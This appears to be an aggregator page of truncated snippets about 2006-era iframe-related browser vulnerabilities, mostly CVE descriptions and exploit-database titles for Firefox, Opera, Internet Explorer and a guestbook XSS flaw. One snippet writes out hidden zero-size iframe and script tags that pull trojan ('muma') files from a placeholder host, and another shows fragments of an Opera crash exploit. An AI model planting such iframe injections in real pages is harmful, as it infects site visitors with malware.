security flaw

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via 1 nested tags in a select tag, 2 a DOMNodeRemoved mutation event, 3 "Content-implemented tree views," 4 BoxObjects, 5 the XBL implementation, 6 an ifram...

Hung it to 4 effective method(summary)-vulnerability warning-the black bar safety net

One, the most simple are also the most effective | iframe src=http://www.xxx.com/muma.html width=0 height=0/iframe --- Second, js hang horse script src=http://www. xxx. com/muma. js/script --- Third, the js modification encryption SCRIPT language="JScript. Encode" src=http://www. xxx. com/muma...

CVE-2006-3353

Opera 9 allows remote attackers to cause a denial of service crash via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties...

CVE-2006-3353

Opera 9 is affected by CVE-2006-3353. A crafted web page can cause a denial of service (crash) through an out-of-bounds memory access, triggered by an iframe and JavaScript accessing certain styleSheets properties. The description consistently attributes this to Opera 9 and cites a DoS impact; no...

Opera Web Browser 9.00 - iframe Remote Denial of Service

Opera Web Browser 9.00 - iframe Remote Denial of Service function mystyle if fake.document.styleSheets.length == 1 f = document.forms"basicstyle".elements; for j = 0; j milw0rm.com 2006-07-01...

Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit

Exploit for multiple platform in category dos / poc ================================================================ Opera Web Browser 9.00 iframe Remote Denial of Service Exploit ================================================================ function mystyle if fake.document.styleSheets.length...

Opera Web Browser 9.00 - 'iframe' Remote Denial of Service

function mystyle if fake.document.styleSheets.length == 1 f = document.forms"basicstyle".elements; for j = 0; j milw0rm.com 2006-07-01...

CVE-2006-3200

Unspecified versions of Internet Explorer allow remote attackers to cause a denial of service crash via an IFRAME with a src tag containing a "File://" URI followed by an 8-bit character. NOTE: some third parties were unable to verify this issue...

CVE-2006-3200

Unspecified versions of Internet Explorer allow remote attackers to cause a denial of service crash via an IFRAME with a src tag containing a "File://" URI followed by an 8-bit character. NOTE: some third parties were unable to verify this issue...

freecodesource.txt

Freecodesource.com is a distributor of myspace profile mods and general crapola. They provide an swf file which allows a myspace user to pop an alert box on profile page load, with custom text; the text is extracted from the url of the swf file, then used as a get parameter 'what' to the url...

Cross site scripting

Cross-site scripting XSS vulnerability in Lycos Tripod htmlGEAR guestGEAR aka Guest Gear allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

CVE-2006-2808

Cross-site scripting XSS vulnerability in Lycos Tripod htmlGEAR guestGEAR aka Guest Gear allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

DEBIAN-CVE-2006-2779

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via 1 nested tags in a select tag, 2 a DOMNodeRemoved mutation event, 3 "Content-implemented tree views," 4 BoxObjects, 5 the XBL implementation, 6 an ifram...

CVE-2006-2779

Mozilla Firefox and Thunderbird before 1.5.0.4 allow remote attackers to cause a denial of service crash and possibly execute arbitrary code via 1 nested tags in a select tag, 2 a DOMNodeRemoved mutation event, 3 "Content-implemented tree views," 4 BoxObjects, 5 the XBL implementation, 6 an ifram...

MediaPlayer+IE6 the latest vulnerability of the simple research-vulnerability warning-the black bar safety net

This vulnerability only IE6. 0 and above versions. Because from IE6 began to support something like the following java script:window. open"http://ip/";,"media"; The main problem out here. All of the following code are in XP+WMP8. 0+IE6. 0 1+IIS6. 0 environment test pass. Wherein xp and IE by...

Internet Explorer IFRAME buffer overflow

Added: 05/03/2006 CVE: CVE-2004-1050 BID: 11515 OSVDB: 11337 Background Internet Explorer is an HTML web browser which comes by default on Microsoft operating systems. Problem A buffer overflow when processing the name attribute in an IFRAME tag allows command execution when a malformed web page ...

Internet Explorer IFRAME buffer overflow

Added: 05/03/2006 CVE: CVE-2004-1050 BID: 11515 OSVDB: 11337 Background Internet Explorer is an HTML web browser which comes by default on Microsoft operating systems. Problem A buffer overflow when processing the name attribute in an IFRAME tag allows command execution when a malformed web page ...

Internet Explorer IFRAME buffer overflow

Added: 05/03/2006 CVE: CVE-2004-1050 BID: 11515 OSVDB: 11337 Background Internet Explorer is an HTML web browser which comes by default on Microsoft operating systems. Problem A buffer overflow when processing the name attribute in an IFRAME tag allows command execution when a malformed web page ...

Internet Explorer IFRAME buffer overflow

Added: 05/03/2006 CVE: CVE-2004-1050 BID: 11515 OSVDB: 11337 Background Internet Explorer is an HTML web browser which comes by default on Microsoft operating systems. Problem A buffer overflow when processing the name attribute in an IFRAME tag allows command execution when a malformed web page ...

Buffer overflow

Mozilla Firefox 1.5.0.2, when designMode is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain Javascript that is not properly handled by the contentWindow.focus method in an iframe, which causes a reference to a deleted controller contex...